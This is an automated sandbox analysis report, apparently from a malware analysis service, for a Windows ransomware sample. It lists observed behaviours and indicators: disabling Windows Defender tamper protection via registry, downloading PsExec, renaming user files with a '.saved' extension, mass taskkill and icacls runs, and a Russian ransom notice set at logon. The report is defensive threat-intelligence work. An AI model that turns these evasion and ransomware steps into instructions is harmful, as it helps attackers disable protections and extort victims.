34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89

Resubmissions

29-10-2021 09:15

211029-k7w6esdad6 10

24-08-2021 15:41

210824-hbt188jvma 10

Analysis

max time kernel
152s
max time network
152s
platform
windows7_x64
resource
win7v20210410
submitted
24-08-2021 15:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Size

366KB
MD5

a24e438b9535cfb06f66dbd5b11a7680
SHA1

f998c708668743677064db9307cf274c17dd9a5a
SHA256

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89
SHA512

b65c5fac207297fe0219f03779729789de443880b1d71f099ec29a17183f37a1d9d8f1f2d4484f5fc95fa647562fd565e20a1f4a81b61d89e078a8405f41c5fa

Score

10^/10

discovery evasion persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Downloads PsExec from SysInternals website 1 IoCs

Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

description	flow	ioc
HTTP URL	19	http://live.sysinternals.com/PsExec.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 8 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\MergeShow.tif.saved	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File renamed	C:\Users\Admin\Pictures\SplitInstall.crw => C:\Users\Admin\Pictures\SplitInstall.crw.saved	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened for modification	C:\Users\Admin\Pictures\SplitInstall.crw.saved	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File renamed	C:\Users\Admin\Pictures\ConvertFromExport.raw => C:\Users\Admin\Pictures\ConvertFromExport.raw.saved	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened for modification	C:\Users\Admin\Pictures\ConvertFromExport.raw.saved	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File renamed	C:\Users\Admin\Pictures\FormatHide.raw => C:\Users\Admin\Pictures\FormatHide.raw.saved	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened for modification	C:\Users\Admin\Pictures\FormatHide.raw.saved	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File renamed	C:\Users\Admin\Pictures\MergeShow.tif => C:\Users\Admin\Pictures\MergeShow.tif.saved	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2364	icacls.exe
2496	icacls.exe
3052	icacls.exe
1708	icacls.exe
324	icacls.exe
2104	icacls.exe
2964	icacls.exe
2276	icacls.exe
3064	icacls.exe
2132	icacls.exe
1352	icacls.exe
2328	icacls.exe
2444	icacls.exe
656	icacls.exe
1400	icacls.exe
2536	icacls.exe
2204	icacls.exe
760	icacls.exe
2380	icacls.exe
780	icacls.exe
1176	icacls.exe
3056	icacls.exe
2076	icacls.exe
2492	icacls.exe
2864	icacls.exe
2596	icacls.exe
2584	icacls.exe
748	icacls.exe
1320	icacls.exe
1632	icacls.exe
2460	icacls.exe
2356	icacls.exe
2440	icacls.exe
2552	icacls.exe
2588	icacls.exe
2856	icacls.exe
2788	icacls.exe
1272	icacls.exe
2560	icacls.exe
2000	icacls.exe
1080	icacls.exe
2528	icacls.exe
2572	icacls.exe
2088	icacls.exe
2512	icacls.exe
2720	icacls.exe
476	icacls.exe
2540	icacls.exe
556	icacls.exe
972	icacls.exe
2316	icacls.exe
2460	icacls.exe
976	icacls.exe
2372	icacls.exe
3028	icacls.exe
288	icacls.exe
2336	icacls.exe
2416	icacls.exe
1996	icacls.exe
1380	icacls.exe
2360	icacls.exe
1044	icacls.exe
2524	icacls.exe
2640	icacls.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\O:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\F:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\G:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\J:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\V:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\T:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\W:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\E:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\I:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\P:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\X:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\N:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\Q:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\Y:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\A:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\H:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\M:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\R:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\S:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\K:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\L:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\Z:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\B:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\U:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	icanhazip.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Внимание Внимание Внимание!\r\n\r\nДобрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 58 IoCs

evasion

pid	Process
1084	taskkill.exe
1064	taskkill.exe
1040	taskkill.exe
1572	taskkill.exe
856	taskkill.exe
1100	taskkill.exe
876	taskkill.exe
1484	taskkill.exe
1492	taskkill.exe
2112	taskkill.exe
1964	taskkill.exe
288	taskkill.exe
1188	taskkill.exe
2876	taskkill.exe
932	taskkill.exe
412	taskkill.exe
2368	taskkill.exe
2208	taskkill.exe
2712	taskkill.exe
2796	taskkill.exe
2916	taskkill.exe
1664	taskkill.exe
1548	taskkill.exe
1300	taskkill.exe
2632	taskkill.exe
1624	taskkill.exe
1168	taskkill.exe
2192	taskkill.exe
1504	taskkill.exe
2548	taskkill.exe
2836	taskkill.exe
604	taskkill.exe
2296	taskkill.exe
1016	taskkill.exe
720	taskkill.exe
564	taskkill.exe
1848	taskkill.exe
2384	taskkill.exe
2672	taskkill.exe
476	taskkill.exe
1080	taskkill.exe
2280	taskkill.exe
1560	taskkill.exe
1156	taskkill.exe
1916	taskkill.exe
1684	taskkill.exe
1104	taskkill.exe
2472	taskkill.exe
324	taskkill.exe
2460	taskkill.exe
2752	taskkill.exe
2956	taskkill.exe
1712	taskkill.exe
1496	taskkill.exe
460	taskkill.exe
832	taskkill.exe
2100	taskkill.exe
2592	taskkill.exe

Modifies registry class 20 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	splwow64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}"	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	splwow64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}"	splwow64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0"	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	splwow64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_Classes\Local Settings	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags	splwow64.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1124	reg.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Suspicious use of AdjustPrivilegeToken 61 IoCs

description	pid	Process
Token: SeDebugPrivilege	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Token: SeDebugPrivilege	380	powershell.exe
Token: SeDebugPrivilege	572	powershell.exe
Token: SeDebugPrivilege	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Token: SeDebugPrivilege	1664	taskkill.exe
Token: SeDebugPrivilege	1712	taskkill.exe
Token: SeDebugPrivilege	1684	taskkill.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	856	taskkill.exe
Token: SeDebugPrivilege	1624	taskkill.exe
Token: SeDebugPrivilege	1100	taskkill.exe
Token: SeDebugPrivilege	832	taskkill.exe
Token: SeDebugPrivilege	876	taskkill.exe
Token: SeDebugPrivilege	1496	taskkill.exe
Token: SeDebugPrivilege	604	taskkill.exe
Token: SeDebugPrivilege	460	taskkill.exe
Token: SeDebugPrivilege	1484	taskkill.exe
Token: SeDebugPrivilege	1064	taskkill.exe
Token: SeDebugPrivilege	1504	taskkill.exe
Token: SeDebugPrivilege	1156	taskkill.exe
Token: SeDebugPrivilege	932	taskkill.exe
Token: SeDebugPrivilege	1168	taskkill.exe
Token: SeDebugPrivilege	1040	taskkill.exe
Token: SeDebugPrivilege	1104	taskkill.exe
Token: SeDebugPrivilege	324	taskkill.exe
Token: SeDebugPrivilege	1548	taskkill.exe
Token: SeDebugPrivilege	1964	taskkill.exe
Token: SeDebugPrivilege	1300	taskkill.exe
Token: SeDebugPrivilege	1016	taskkill.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	412	taskkill.exe
Token: SeDebugPrivilege	1916	taskkill.exe
Token: SeDebugPrivilege	476	taskkill.exe
Token: SeDebugPrivilege	288	taskkill.exe
Token: SeDebugPrivilege	564	taskkill.exe
Token: SeDebugPrivilege	1080	taskkill.exe
Token: SeDebugPrivilege	1188	taskkill.exe
Token: SeDebugPrivilege	1492	taskkill.exe
Token: SeDebugPrivilege	1848	taskkill.exe
Token: SeDebugPrivilege	2100	taskkill.exe
Token: SeDebugPrivilege	2112	taskkill.exe
Token: SeDebugPrivilege	2192	taskkill.exe
Token: SeDebugPrivilege	2208	taskkill.exe
Token: SeDebugPrivilege	2280	taskkill.exe
Token: SeDebugPrivilege	2296	taskkill.exe
Token: SeDebugPrivilege	2368	taskkill.exe
Token: SeDebugPrivilege	2384	taskkill.exe
Token: SeDebugPrivilege	2460	taskkill.exe
Token: SeDebugPrivilege	2472	taskkill.exe
Token: SeDebugPrivilege	2548	taskkill.exe
Token: SeDebugPrivilege	2592	taskkill.exe
Token: SeDebugPrivilege	2632	taskkill.exe
Token: SeDebugPrivilege	2672	taskkill.exe
Token: SeDebugPrivilege	2712	taskkill.exe
Token: SeDebugPrivilege	2752	taskkill.exe
Token: SeDebugPrivilege	2796	taskkill.exe
Token: SeDebugPrivilege	2836	taskkill.exe
Token: SeDebugPrivilege	2876	taskkill.exe
Token: SeDebugPrivilege	2916	taskkill.exe
Token: SeDebugPrivilege	2956	taskkill.exe
Token: SeDebugPrivilege	2996	powershell.exe

